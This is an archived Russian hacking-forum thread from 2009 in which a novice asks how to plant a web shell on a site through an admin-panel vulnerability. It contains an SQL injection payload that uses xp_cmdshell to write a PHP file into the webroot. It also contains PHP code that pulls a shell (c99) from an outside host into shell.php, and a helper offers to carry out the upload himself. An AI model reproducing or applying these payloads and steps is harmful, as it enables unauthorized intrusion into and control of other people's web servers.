Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Помогите с Shellom (https://forum.antichat.xyz/showthread.php?t=124947)

Scetcher 12.06.2009 21:12

Помогите с Shellom
 
Всем привет, я новичок в этом деле на счет шеллов и никак немгу понять как мне прописать чтобы залить шелл, я захожу в админку там есть уязвимость через которую и можно прописать шелл, ну вот вопрос состоит как прописать ссылку например www.ссылка_на_шелл/c99.php
Получается только залить phpinfo
PHP код:

; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:\AppServ\www\shell.php';--

Ссылку вписываю так
http://pic.ipicture.ru/uploads/090612/Pd0bq7RGih.jpg

Я вот сам немогу сообразить какб ы это обьянсить поподробней:((
Ну я хочу через CMD залить шелл

+++AndreyDevil+++ 12.06.2009 21:19

Что то не то...3 раза перечитывал

diznt 12.06.2009 21:36

Через cmd нельзя никак (так как у тебя вроде нету доступа к нему на сколько я понял)
Поищи в гугле "Мини шелл" (там все таки не полный шелл но можно что то сделать)
А вообще надо смотреть какая у тя ситуация так будет лучше понимание людей (понимание проблемы)

Scetcher 12.06.2009 21:43

Цитата:

Сообщение от diznt
Через cmd нельзя никак (так как у тебя вроде нету доступа к нему на сколько я понял)
Поищи в гугле "Мини шелл" (там все таки не полный шелл но можно что то сделать)
А вообще надо смотреть какая у тя ситуация так будет лучше понимание людей (понимание проблемы)

Ну через CMD получается же сделать PHPINFO
http://pic.ipicture.ru/uploads/090612/UStrycXtow.jpg

diznt 12.06.2009 21:54

<?php
copy('http://yazzz.com/shell.txt','shell.php');
?>

Вот код
Вместо www.yazzz.com/shell.txt пишешь путь до шелла который ты сам залил на какой нибуть хост, так как дальше его содержимое будет копироваться в файл shell.php (главное чтобы файл shell.php существовал уже в каталоге!)(шелл можно достать на madnet.name)
Главное чтобы было с http вначале иначе код наврятли сработает

Пробуй вообщем в правильности кода я не уверен

Scetcher 12.06.2009 22:01

ничего неполучается:((((((((

diznt 12.06.2009 22:06

Щас попробуй!
Я там просто обновлял пост (ошибки были)
А лучше напиши как сначала будешь делать и что писать чтобы я смог проверить все ли правильно!
Работать должно так как протестил на локалке

Scetcher 12.06.2009 22:08

При вводе этого у меня
Цитата:

Fatal error: Call to a member function fetchrow() on a non-object in C:\AppServ\www\administrator\editcharacter.php on line 12

diznt 12.06.2009 22:10

Скинь уязвимость в ПМ (если через акк уязв. то с акком) попробую залить шелл. как залью расскажу что и как я делал

Scetcher 12.06.2009 22:21

Напиши в аську плиз
384-586-512


Время: 08:41